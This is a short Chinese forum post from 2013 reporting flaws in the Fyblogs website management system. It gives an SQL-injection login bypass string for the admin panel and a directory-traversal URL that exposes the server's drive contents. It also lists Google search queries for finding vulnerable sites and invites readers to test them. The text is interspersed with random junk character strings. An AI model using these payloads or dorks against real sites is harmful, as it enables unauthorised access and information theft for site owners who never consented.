漏洞类型: 未授权访问/权限绕过 @- i0 x" x& e! _- U3 W8 U1 G
' }% o$ F# ]0 p, X5 R, R) w简要描述:! r! [ w6 }0 E# T8 t2 G% r
' d3 A" d+ `& u" n
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
; Y% [: g2 Y4 \# V7 G8 a6 T/ x# R8 a" u0 U
详细说明:5 q. n: r4 u0 t2 S
) e6 F* U" r0 ^2 s" y3 a
后台万能密码 'or'='or'
( h) E' `- x: l8 X2 \2 W; `3 ?后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
, G4 K: b1 x5 c4 f: {, Dadmin/uploadfile.asp?currentFolder=/upfiles/../8 V ]6 Q* w2 P$ \6 z9 g
$ Z1 M r$ }) q) X7 r7 D1 o# q
漏洞证明:
6 C! T2 a7 \7 |/ \5 U+ [5 G, U
/ K# ~; s) }4 c- M谷歌:inurl:type.asp?id=1 新闻中心6 h% [" D/ t$ L8 _2 ~7 s
或者 :inurl:download_ok.asp?
r5 i% y5 H; c# c
% J# R2 b7 n3 y- {' |5 x5 ~# g# e可以测试/ k5 e3 U$ S6 P1 ?
" ^6 W$ h4 r; _ i& L5 j
4 g5 `1 _# A2 u& e
|
发表于 2013-3-7 13:07:46
收藏
支持
反对